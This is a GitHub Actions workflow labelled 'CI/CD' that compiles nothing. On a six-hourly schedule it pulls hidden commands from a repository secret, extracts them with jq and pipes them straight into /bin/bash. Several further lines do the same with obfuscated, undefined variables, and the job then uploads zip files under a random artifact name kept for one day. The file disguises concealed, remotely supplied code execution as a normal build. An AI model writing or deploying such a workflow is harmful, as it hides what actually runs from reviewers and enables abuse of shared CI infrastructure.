name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '6 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          nbc4648: ${{ secrets.nbc4648 }}
        run: |
          printf '%s' "$nbc4648" | jq -r .lie02 | /bin/bash
          printf '%s' "$d9240" | jq -r .ee4 | /bin/bash
          echo $emx491 | jq -r .whvb0395 | /bin/bash
          printf '%s' "$lhb454" | jq -r .w53 | /bin/bash
          printf '%s' "$xjhb117" | jq -r .bifbg32 | /bin/bash
          printf '%s' "$heri71" | jq -r .i8 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: vd1OOglh
          path: "*.zip"
          retention-days: 1
